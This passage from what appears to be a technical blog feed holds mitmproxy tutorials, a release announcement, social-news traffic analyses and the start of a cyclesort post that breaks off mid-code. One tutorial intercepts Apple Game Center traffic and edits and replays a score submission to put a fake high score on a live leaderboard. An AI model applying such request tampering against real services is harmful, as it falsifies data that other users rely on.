keep an eye on the blog for more in the coming days.</p> <h2 id="a-30-second-client-playback-example">A 30-second client playback example</h2> <p>My local cafe is serviced by a rickety and unreliable wireless network, generously sponsored with ratepayers' money by our city council. After connecting, you are redirected to an SSL-protected page that prompts you for a username and password. Once you've entered your details, you are free to enjoy the intermittent dropouts, treacle-like speeds and incorrectly configured transparent proxy.</p> <p>I tend to automate this kind of thing at the first opportunity, on the theory that time spent now will be more than made up in the long run. In this case, I might use <a rel="external" href="http://getfirebug.com/">Firebug</a> to ferret out the form post parameters and target URL, then fire up an editor to write a little script using Python's <a rel="external" href="http://docs.python.org/library/urllib.html">urllib</a> to simulate a submission. That's a lot of futzing about. With mitmproxy we can do the job in literally 30 seconds, without having to worry about any of the details. Here's how.</p> <h3 id="1-run-mitmdump-to-record-our-http-conversation-to-a-file">1. Run mitmdump to record our HTTP conversation to a file.</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmdump -w wireless-login</span></span></code></pre><h3 id="2-point-your-browser-at-the-mitmdump-instance">2. Point your browser at the mitmdump instance.</h3> <p>I use a tiny Firefox addon called <a rel="external" href="https://addons.mozilla.org/en-us/firefox/addon/toggle-proxy-51740/">Toggle Proxy</a> to switch quickly to and from mitmproxy. I'm assuming you've already <a rel="external" href="http://mitmproxy.org/doc/ssl.html">configured your browser with mitmproxy's SSL certificate authority</a>.</p> <h3 id="3-log-in-as-usual">3. Log in as usual.</h3> <p>And that's it! You now have a serialized version of the login process in the file wireless-login, and you can replay it at any time like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmdump -c wireless-login</span></span></code></pre><h2 id="embellishments">Embellishments</h2> <p>We're really done at this point, but there are a couple of embellishments we could make if we wanted. I use <a rel="external" href="http://wicd.sourceforge.net/">wicd</a> to automatically join wireless networks I frequent, and it lets me specify a command to run after connecting. I used the client replay command above and voila! - totally hands-free wireless network startup.</p> <p>We might also want to prune requests that download CSS, JS, images and so forth. These add only a few moments to the time it takes to replay, but they're not really needed and I somehow feel compelled trim them anyway. So, we fire up the mitmproxy console tool on our serialized conversation, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmproxy wireless-login</span></span></code></pre> <p>We can now go through and manually delete (using the <strong>d</strong> keyboard shortcut) everything we want to trim. When we're done, we use <strong>S</strong> to save the conversation back to the file.</p> mitmproxy: Breaking Apple's Game Center with replay 2011-03-31T00:00:00+00:00 2011-03-31T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/tute-gamecenter/ <p>This is the second in the series of tutorials I'm writing for <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. You can find the first one - a 30 second tutorial on client replay - <a href="https://corte.si/posts/code/mitmproxy/tute-30-seconds/">here</a>. There will be more to come in the next few days.</p> <h2 id="the-setup">The setup</h2> <p>In this tutorial, I'm going to show you how simple it is to creatively interfere with Apple Game Center traffic using mitmproxy. To set things up, I registered my mitmproxy CA certificate with my iPhone - there's a <a rel="external" href="http://mitmproxy.org/doc/certinstall/ios.html">step by step set of instructions</a> for doing this in the mitmproxy docs. I then started mitmproxy on my desktop, and configured the iPhone to use it as a proxy.</p> <h2 id="taking-a-look-at-the-game-center-traffic">Taking a look at the Game Center traffic</h2> <p>Lets take a first look at the Game Center traffic. The game I'll use in this tutorial is <a rel="external" href="http://itunes.apple.com/us/app/super-mega-worm/id388541990?mt=8">Super Mega Worm</a> - a great little retro-apocalyptic sidescroller for the iPhone:</p> <div class="media"> <a href="supermega.png"> <img src="supermega.png" /> </a> </div> <p>After finishing a game (take your time), watch the traffic flowing through mitmproxy:</p> <div class="media"> <a href="one.png"> <img src="one.png" /> </a> </div> <p>We see a bunch of things we might expect - initialisation, the retrieval of leaderboards and so forth. Then, right at the end, there's a POST to this tantalising URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>https://service.gc.apple.com/WebObjects/GKGameStatsService.woa/wa/submitScore</span></span></code></pre> <p>The contents of the submission are particularly interesting:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">plist</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;category&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">string</span><span>&gt;SMW_Adv_USA1&lt;/</span><span style="color: #22863A;">string</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;score-value&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;55&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;timestamp&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;1301553284461&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">plist</span><span>&gt;</span></span></code></pre> <p>This is a <a rel="external" href="http://en.wikipedia.org/wiki/Property_list">property list</a>, containing an identifier for the game, a score (55, in this case), and a timestamp. Looks pretty simple to mess with.</p> <h2 id="modifying-and-replaying-the-score-submission">Modifying and replaying the score submission</h2> <p>Lets edit the score submission. First, select it in mitmproxy, then press <strong>enter</strong> to view it. Make sure you're viewing the request, not the response - you can use <strong>tab</strong> to flick between the two. Now press <strong>e</strong> for edit. You'll be prompted for the part of the request you want to change - press <strong>b</strong> for body. Your preferred editor (taken from the EDITOR environment variable) will now fire up. Lets bump the score up to something a bit more ambitious:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">plist</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;category&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">string</span><span>&gt;SMW_Adv_USA1&lt;/</span><span style="color: #22863A;">string</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;score-value&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;2200272667&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;timestamp&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;1301553284461&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">plist</span><span>&gt;</span></span></code></pre> <p>Save the file and exit your editor.</p> <p>The final step is to replay this modified request. Simply press <strong>r</strong> for replay.</p> <h2 id="the-glorious-result-and-some-intrigue">The glorious result and some intrigue</h2> <div class="media"> <a href="leaderboard.png"> <img src="leaderboard.png" /> </a> </div> <p>And that's it - according to the records, I am the greatest Super Mega Worm player of all time.</p> <p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you think that number seems familiar, you're right: it's 2^31-1, the maximum value you can fit into a signed 32-bit int. Now let me tell you another peculiar thing about Super Mega Worm - at the end of every game, it submits your highest previous score to the Game Center, not your current score. This means that it stores your highscore somewhere, and I'm guessing that it reads that stored score back into a signed integer. So, if you <em>were</em> to cheat by the relatively pedestrian means of modifying the saved score on your jailbroken phone, then 2^31-1 might well be the maximum score you could get. Then again, if the game itself stores its score in a signed 32-bit int, you could get the same score through perfect play, effectively beating the game. So, which is it in this case? I'll leave that for you to decide.</p> mitmproxy 0.4 has been released 2011-03-30T00:00:00+00:00 2011-03-30T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_4/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I've just tagged and released mitmproxy 0.4. You can download it from the new project website:</p> <h2 id="mitmproxy-org"><a rel="external" href="http://mitmproxy.org">mitmproxy.org</a></h2> <p>This is a huge update, with dozens of new features, and improvements to almost every aspect of the project. A few highlights are:</p> <ul> <li>Complete serialization of HTTP/S conversations</li> <li>On-the-fly generation of SSL interception certificates</li> <li>Ability to replay both the client and the server side of HTTP/S conversations</li> <li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP/S</li> <li>Scripting hooks for programmatic modification of traffic using Python</li> <li>Many, many user interface improvements, bug fixes, and minor features</li> <li>Better <a rel="external" href="http://mitmproxy.org/doc/index.html">documentation</a>.</li> </ul> <p>Special thanks go to <a rel="external" href="http://www.henriknordstrom.net/">Henrik Nordström</a> for many great contributions to this release. I'd love more contributors to join the project - if you feel like hacking on mitmproxy, take a look at the <a rel="external" href="https://github.com/cortesi/mitmproxy/blob/master/todo">todo</a> file at the top of the tree for ideas.</p> <p>Over the next week I will write a series of tutorials to showcase mitmproxy's abilities, ranging from simple to quite complex. Keep an eye on the blog for these - they will be published here first, before making their way into the official documentation.</p> Social news eats a blog post 2011-01-24T00:00:00+00:00 2011-01-24T00:00:00+00:00 https://corte.si/posts/socialmedia/post-lifecycle/ <p>This is the second post in which I try to add some data to my nagging doubts about the technical news ecosystem. In my <a href="https://corte.si/posts/socialmedia/redditgraph/">previous post</a>, I showed off a visualisation of how the proggit front page changes over time. In this post, I take a look at the flip-side of the coin - what happens to a specific post as it passes through the short, fickle social news cycle? To do this, I'll take a deep dive into my own server logs, looking at a <a href="https://corte.si/posts/code/cyclesort/">recent post of mine</a> that appeared briefly on both <a rel="external" href="http://news.ycombinator.com">Hacker News</a> and <a rel="external" href="http://www.reddit.com/r/programming%22">proggit</a>. I'd guess that nearly all posts follow more or less the same trajectory as they are extruded through the social news mill, so this should be interesting to more people than just me. At the risk of making things a bit dry and descriptive, I'm saving speculation and interpretation for a future post.</p> <p>The scene is set at about 10pm New Zealand time, when I put the finishing touches to my blog post, and fire off an rsync up to my server. I quickly double-check that the blog and the RSS feed have updated OK, <a rel="external" href="http://twitter.com/cortesi/status/6627667512131584">tweet a link</a> to the post, and go to bed. While I sleep, the post creeps onto both Hacker News and proggit, ultimately getting 41000 hits over the next 5 days or so. The graphs below show only the first 50 hours of the post's lifetime - everything after that is just a long, slow dénouement as it dwindles into obscurity.</p> <h2 id="our-real-time-robot-overlords">Our real-time robot overlords</h2> <p>The action starts almost as soon as I click the "tweet" button. Within seconds, the post is retrieved by Twitterbot. One second later, Googlebot appears, and almost simultaneously I get hit by Jaxified, Njuice, LinkedIn and PostRank. In all, 10 bots read my blog post within the first minute, handily beating the first human, who slouches lethargically into view at a tardy 90 seconds.</p> <p>Below is a list of the bots that retrieved my post before the first submission to a social news site. These are the realtime robots, presumably hoovering up the Twitter firehose and indexing all the links they find. The cast of characters is a mixture of the expected big fish, stealth startups, and skunkworks projects at well-known companies. Bot identity was gleaned from HTTP <a rel="external" href="http://en.wikipedia.org/wiki/User_agent">user-agent</a> headers when they were provided, or by checking the ownership of the responsible IP through reverse DNS resolution and whois lookups when they weren't. Most of the real-time bots were well behaved, identifying themselves clearly with a URL in the user-agent string.</p> <style> .soctable td { padding-left: 0 !important; } </style> <table class="soctable"> <tr> <th>minutes after publication</th> <th>bot</th> </tr> <tr> <td rowspan="10">1</td> <td><a href="http://twitter.com">Twitter</a></td> </tr> <tr> <td><a href="http://www.google.com/bot.html">Google</a></td> </tr> <tr> <td><a href="http://www.jaxified.com/crawler">Jaxified</a></td> </tr> <tr> <td><a href="http://njuice.com/">NJuice</a></td> </tr> <tr> <td><a href="http://www.linkedin.com">LinkedIn</a></td> </tr> <tr> <td><a href="http://www.postrank.com/">PostRank</a></td> </tr> <tr> <td>Unidentified bot from a Microsoft-owned IP</td> </tr> <tr> <td><a href="http://help.yahoo.com/help/us/ysearch/slurp">Yahoo! Slurp</a></td> </tr> <tr> <td>Unidentified bot from a <a href="http://www.bbc.co.uk/blogs/rad/">BBC RAD labs</a> IP. </td> </tr> <tr> <td><a href="http://www.oneriot.com/">OneRiot</a></td> </tr> <tr> <td rowspan="4">2</td> <td><a href="http://friendfeed.com/about/bot">FriendFeed</a></td> </tr> <tr> <td><a href="http://www.kosmix.com/">Kosmix</a></td> </tr> <tr> <td><a href="http://labs.topsy.com/butterfly/">Topsy Butterfly</a></td> </tr> <tr> <td>Unidentified bot from <a href="http://marban.com">marban.com</a> subdomain. (PoPUrls?)</td> </tr> <tr> <td rowspan="2">3</td> <td><a href="http://metauri.com/">metauri.com</a></td> </tr> <tr> <td><a href="http://search.msn.com/msnbot.htm">msnbot</a></td> </tr> <tr> <td rowspan="2">6</td> <td><a href="http://summify.com">Summify</a></td> </tr> <tr> <td>Bot identifying itself just as "NING", can't confirm that it's <a href="http://www.ning.com/">the Ning</a>. </td> </tr> <tr> <td>9</td> <td><a href="http://tineye.com/crawler.html">tineye</a></td> </tr> <tr> <td>26</td> <td><a href="http://spinn3r.com/robot">spinn3r.com</a></td> </tr> <tr> <td>27</td> <td><a href="http://www.backtype.com/">backtype.com</a></td> </tr> <tr> <td>47</td> <td><a href="http://www.facebook.com/externalhit_uatext.php">facebookexternalhit</a></td> </tr> </table> <h2 id="enter-the-heavyweights-hacker-news-and-reddit">Enter the heavyweights: Hacker News and Reddit</h2> <p>48 minutes after the post was published, the first hit from a social news site appears: hello <a href="http://news.ycombinator.com">Hacker News</a>. The post quickly makes it onto the front page, and HN traffic peaks at 399 hits per hour in the second hour after publication. All told, the post got 2337 hits with a HN <a rel="external" href="http://en.wikipedia.org/wiki/HTTP_referrer">referrer header</a>.</p> <div class="media"> <a href="ycombinator.png"> <img src="ycombinator.png" /> </a> <div class="subtitle"> news.ycombinator.com </div> </div> <p>Two hours and three minutes after publication, the real monster of social news arrives: the first hit from Reddit appears. The Reddit traffic peaks in the sixth hour after publication at 3025 hits per hour, and delivers a total of 23807 hits in the 51 hours after publication.</p> <div class="media"> <a href="reddit.png"> <img src="reddit.png" /> </a> <div class="subtitle"> reddit.com/r/programming </div> </div><h2 id="the-long-tail">The long tail</h2> <p>Reddit accounted for the vast majority of the post's traffic, dwarfing all other sources combined. In all, I received only 2300 hits with specified referrer headers that weren't Reddit or HN. Here are all the referrers that were responsible for more than 10 hits to the post:</p> <table> <tr><th>hits</th><th>site</th></tr> <tr><th>456</th> <td><a href="http://popurls.com">popurls.com</a></td></tr> <tr><th>359</th> <td><a href="http://www.google.com/reader">Google Reader</a></td></tr> <tr><th>282</th> <td><a href="http://twitter.com">Twitter</a></td></tr> <tr><th>196</th> <td><a href="http://jimmyr.com">jimmyr.com</a></td></tr> <tr><th>183</th> <td><a href="http://delicious.com">delicious</a></td></tr> <tr><th>153</th> <td><a href="http://pop.is">pop.is</a></td></tr> <tr><th>139</th> <td><a href="http://www.google.com">Google Search</a></td></tr> <tr><th>82</th> <td><a href="http://www.wired.com">wired.com</a></td></tr> <tr><th>56</th> <td><a href="http://www.facebook.com">Facebook</a></td></tr> <tr><th>36</th> <td><a href="http://longurl.com">longurl.com</a></td></tr> <tr><th>36</th> <td><a href="http://glozer.net/trendy">glozer.net/trendy</a></td></tr> <tr><th>30</th> <td><a href="http://oursignal.com">oursignal.com</a></td></tr> <tr><th>28</th> <td><a href="http://hackurls.com">hackurls.com</a></td></tr> <tr><th>24</th> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td></tr> <tr><th>18</th> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td></tr> <tr><th>15</th> <td><a href="http://dzone.com">dzone.com</a></td></tr> <tr><th>11</th> <td><a href="http://www.freshnews.com">www.freshnews.org</a></td></tr> </table> <p>It's interesting to see that I got nearly 200 hits from delicous.com. By contrast, <a rel="external" href="http://pinboard.in">pinboard.in</a> - which seems to be delicous.com's anointed successor - sent me only two hits. Then again, my post was published in late November 2010, about a month before Yahoo <a rel="external" href="http://techcrunch.com/2010/12/16/is-yahoo-shutting-down-del-icio-us/">spectacularly hobbled</a> their bookmarking property. I wonder what those figures would look like today.</p> <p>The thin end of the long tail are the 200 hits from 94 sites that were responsible for 10 or fewer hits each. We can break this motley crew up into a few different classes:</p> <ul> <li>Sites that provide some sort of social news analysis, piggy-backing off HN, Reddit and delicious.com. For example, <a rel="external" href="http://popacular.com">popacular.com</a>, <a rel="external" href="http://seesmic.com">seesmic.com</a>, <a rel="external" href="http://hotgrog.com">hotgrog.com</a>.</li> <li>URL shorteners like <a rel="external" href="http://j.mp">j.mp</a> and unshorteners like <a rel="external" href="http://unitny.me">untiny.me</a></li> <li>Social media-ish services like <a rel="external" href="http://friendfeed.com">FriendFeed</a>, <a rel="external" href="http://stumbleupon.com">StumbleUpon</a>, <a rel="external" href="http://pinboard.in">pinboard.in</a></li> <li>Tiny personal blogs.</li> <li>And, surprisingly - a number of sites that just provide an alternative interface or URL for Hacker News: <a rel="external" href="http://hackerne.ws/">hackerne.ws</a>, <a rel="external" href="http://ihackernews.com/">ihackernews.com</a>, <a rel="external" href="http://hacker-newspaper.gilesb.com/">hacker-newspaper.gilesb.com</a>, <a rel="external" href="http://www.icombinator.net/">www.icombinator.net</a>.</li> </ul> <h2 id="robot-scavengers-of-the-social-news-ecosphere">Robot scavengers of the social news ecosphere</h2> <p>Let's take a look at overall bot traffic, separating out our silicone friends by looking for non-human and non-standard user-agent headers. The moment the post hits the HN front page bot traffic spikes, and this spike continues as the post is submitted to Reddit and starts its climb up the proggit front page.</p> <div class="media"> <a href="robots.png"> <img src="robots.png" /> </a> <div class="subtitle"> robots </div> </div> <p>Enter the robot scavengers of the social news ecosphere - a set of second-tier aggregators that monitor social news and Twitter for hot stories. Here's a sample of bot visitors, taken more or less at random from the logs:</p> <table> <tr><td><a href="http://inagist.com">inagist.com</a></td> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td> <td><a href="http://chattertrap.com">chattertrap.com</a></td> <td><a href="http://twingly.com">twingly.com</a></td></tr> <tr><td><a href="http://coder.io">coder.io</a></td> <td><a href="http://newsmagpie.com">newsmagpie.com</a></td> <td><a href="http://worio.com">worio.com</a></td> <td><a href="http://www.myvbo.com">www.myvbo.com</a></td></tr> <tr><td><a href="http://www.zemanta.com">www.zemanta.com</a></td> <td><a href="http://embed.ly">embed.ly</a></td> <td><a href="http://brandwatch.net">brandwatch.net</a></td> <td><a href="http://www.flipboard.com">www.flipboard.com</a></td></tr> <tr><td><a href="http://paper.li">paper.li</a></td> <td><a href="http://rivva.de">rivva.de</a></td> <td><a href="http://attribyte.com">attribyte.com</a></td> <td><a href="http://diffbot.com">diffbot.com</a></td></tr> <tr><td><a href="http://yoono.com">yoono.com</a></td> <td><a href="http://hatena.net.jp">hatena.net.jp</a></td> <td><a href="http://hourlypress.com">hourlypress.com</a></td> <td><a href="http://longurl.org">longurl.org</a></td></tr> <tr><td><a href="http://untiny.me">untiny.me</a></td> <td><a href="http://goo.ne.jp">goo.ne.jp</a></td> <td><a href="http://www.baidu.com">www.baidu.com</a></td> <td><a href="http://sharethis.com">sharethis.com</a></td></tr> <tr><td><a href="http://ideashower.com">ideashower.com</a></td> <td><a href="http://pannous.info">pannous.info</a></td> <td><a href="http://wikiwix.com">wikiwix.com</a></td> <td><a href="http://pipes.yahoo.com">pipes.yahoo.com</a></td></tr> <tr><td><a href="http://mustexist.com">mustexist.com</a></td> <td><a href="http://pics.fefoo.com">pics.fefoo.com</a></td> <td><a href="http://cyber.law.harvard.edu">cyber.law.harvard.edu</a></td> <td><a href="http://seatgeek.com">seatgeek.com</a></td></tr> <tr><td><a href="http://metadatalabs.com">metadatalabs.com</a></td> <td><a href="http://moreover.com">moreover.com</a></td> <td><a href="http://thinglabs.com">thinglabs.com</a></td> <td><a href="http://stufftotweet.com">stufftotweet.com</a></td></tr> <tr> <td><a href="http://chilitweets.com">chilitweets.com</a></td> <td><a href="http://bkluster.hut.edu.vn">bkluster.hut.edu.vn</a></td> <td><a href="http://wikio.com">wikio.com</a></td> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td> </tr> <tr> <td><a href="http://zite.com">zite.com</a></td> <td><a href="http://zelist.ro">zelist.ro</a></td> <td><a href="http://buzzzy.com">buzzzy.com</a></td> <td><a href="http://intravnews.com">intravnews.com</a></td> </tr> </table> <p>At this point, I'd like to bitch a bit about how astonishingly badly behaved some of the automated systems skulking around today's web are. The vast, vast majority don't provide any clue about the responsible entity in the user-agent string. The list above consists of responsible bots that do identify themselves, and less responsible ones that I could identify through reverse domain resolution. Most of the irresponsible bots come from Amazon Web Services, which seems to be a right wretched hive of scum and villainy. The worst performers here boggle the mind - about a dozen hosts from AWS retrieved the blog post more than 200 times a day, all using full GET requests, without an If-Modified-Since header, and with no identification. The arch-villain hit the post 600 times in its first 24 hours - that's about once every 2.5 minutes.</p> <h2 id="referrer-less-viewers-and-stealthy-bots">Referrer-less viewers and stealthy bots</h2> <p>I was surprised to see that almost 20% of requests not identified as bot requests had no specified referrer, a much greater percentage than I would have anticipated. Here's a graph showing the number of referrer-less requests per hour:</p> <div class="media"> <a href="noreferrer.png"> <img src="noreferrer.png" /> </a> <div class="subtitle"> requests without a referrer </div> </div> <p>It looks like the double-peak in this graph coincides with the traffic peaks from HN and Reddit. This suggests that the majority of these hits do in fact come (perhaps indirectly) from HN and Reddit users. One possibility is that a chunk of this referrer-less traffic comes from non-browser Twitter clients.</p> <p>A fraction of the referrer-less traffic also comes from stealthy bots sending user-agent strings that match those of desktop browsers. About 5% of these requests, for example, come from the Amazon EC2 cloud, so are unlikely to be real browsers. One Internet darling that does this is Instapaper, which seems to use the requesting client's user-agent string rather than frankly confessing itself to be a bot. It also appears to re-request an article in full for each user, rather than simply checking if there's been a change and using a cached copy. On the upside, this means that I know that 131 readers used Instapaper to view my post.</p> <h2 id="aftermath">Aftermath</h2> <p>After the post drifts off the proggit and HN front pages, traffic dies down. There's a dwindling tail of stragglers that bothered to flip through to the second or third page of top stories, and a tiny dribble of users who discovered the link through other sources. A month later, the post gets about 60 hits per day, of which more than a third are from bots. Non-bot traffic is still dominated by Reddit, presumably from people searching or idly flicking through Reddit's history.</p> <p>So, in the end, after my once-thrumming server quiets down, what has the lasting effect been on my own social graph? I had a small surge of Twitter follows, going from 230 to 245 followers. There was a minor blip of subscribers to my RSS feed, with Google Reader reporting subscriptions going from about 510 to 551. Out of 33,000 unique visitors 56 decided to cultivate a more permanent relationship of some sort to my blog. That's 1 in 600. If you remember only one figure from this post, this should be it.</p> A journey through the bowels of proggit 2011-01-12T00:00:00+00:00 2011-01-12T00:00:00+00:00 https://corte.si/posts/socialmedia/redditgraph/ <div class="media"> <a href="proggit4.png"> <img src="proggit4.png" /> </a> <div class="subtitle"> proggit - 4 hours </div> </div> <p>I've had a nagging sense of dissatisfaction with my information diet lately, and it's becoming clear that over-reliance on social news sites like Reddit and Hacker News (much as I love them) lies at the heart of my discontent. For the past few months, I've been gathering data to help me come up with a coherent explanation for my malaise. I'm still working on it, so this post will have no conclusions, only repulsive metaphors and pretty pictures.</p> <p>For a week or so in November I logged the slow, peristaltic progress of stories through the bowels of <a rel="external" href="http://www.reddit.com/r/programming">proggit</a>, watching them get nudged this way and that by the malodorous, hot gas of public opinion before finally being shunted on to the colon of the second page of results. In other words, I sampled the top 25 stories every 5 minutes through the RSS feed. One of the things I was interested in was how submission rankings changed over time, so I visualised the dataset using the same technique I came up with to <a rel="external" href="http://sortvis.org">visualise sorting algorithms</a>. The image above shows 4 hours of proggit, with each submission represented by a line. The lines are coloured based on the average rank the story achieves over its lifetime in the top 25, ranging between upvote orange for top stories, and downvote blue for bottom stories.</p> <p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom and pan around. The busy cut-and-thrust of life on reddit is all here. The meteoric rise, inevitably followed by long, slow decay. The sudden, mysterious, mid-flight disappearances. The jostling and writhing among the bottom submissions that never quite manage to make it into the big leagues. Heady stuff. Click to view:</p> <div class="media"> <a href="proggit72.png"> <img src="mini72.png" /> </a> <div class="subtitle"> proggit - 72 hours </div> </div> <p>Perhaps I'll do an expanded version that lets you view submission titles, times and so forth later on.</p> Cyclesort - a curious little sorting algorithm 2010-11-22T00:00:00+00:00 2010-11-22T00:00:00+00:00 https://corte.si/posts/code/cyclesort/ <p>One of the nice things about building <a rel="external" href="http://sortvis.org">sortvis.org</a> and writing the posts that led up to it is that people email me with pointers to esoteric algorithms I've never heard of. Today's post is dedicated to one of these - a curious little sorting algorithm called <a rel="external" href="http://en.wikipedia.org/wiki/Cycle_sort">cyclesort</a>. It was described in 1990 in a <a rel="external" href="http://comjnl.oxfordjournals.org/content/33/4/365.full.pdf">3-page paper by B.K. Haddon</a>, and has become a firm favourite of mine.</p> <p>Cyclesort has some nice properties - for certain restricted types of data it can do a stable, in-place sort in linear time, while guaranteeing that each element will be moved at most once. But what I really like about this algorithm is how naturally it arises from a simple theorem on <a rel="external" href="http://mathworld.wolfram.com/SymmetricGroup.html">symmetric groups</a>. Bear with me while I work up to the algorithm through a couple of basic concepts.</p> <h2 id="cycles">Cycles</h2> <p>Lets start with the definition of a <a rel="external" href="http://mathworld.wolfram.com/PermutationCycle.html">cycle</a>. A cycle is a subset of elements from a permutation that have been rotated from their original position. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]</strong>, and a cycle <strong>[0, 3, 1]</strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to 1 and 1 to 0. Visually, it looks like this:</p> <div class="media"> <a href="graph1.png"> <img src="graph1.png" /> </a> </div> <p>We can apply a cycle to an ordered set to obtain a permutation, and we can then reverse that cycle to re-obtain the original set. Here's a Python function that applies a cycle to a list in-place:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> apply_cycle</span><span>(lst, c):</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Extract the cycle&#39;s values</span></span> <span class="giallo-l"><span> vals</span><span style="color: #D73A49;"> =</span><span> [lst[i]</span><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span> c]</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Rotate them circularly by one position</span></span> <span class="giallo-l"><span> vals</span><span style="color: #D73A49;"> =</span><span> [vals[</span><span style="color: #D73A49;">-</span><span style="color: #005CC5;">1</span><span>]]</span><span style="color: #D73A49;"> +</span><span> vals[:</span><span style="color: #D73A49;">-</span><span style="color: #005CC5;">1</span><span>]</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Re-insert them into the list</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i, offset</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> enumerate</span><span>(c):</span></span> <span class="giallo-l"><span> lst[offset]</span><span style="color: #D73A49;"> =</span><span> vals[i]</span></span></code></pre> <p>Here's an interactive session showing the function in action:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> lst</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 4</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> c</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 1</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> apply_cycle(lst, c)</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> lst</span></span> <span class="giallo-l"><span>[</span><span style="color: #005CC5;">1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 0</span><span>,</span><span style="color: #005CC5;"> 4</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;</span><span> c.reverse()</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;</span><span> apply_cycle(lst, c)</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;</span><span> lst</span></span> <span class="giallo-l"><span>[</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span 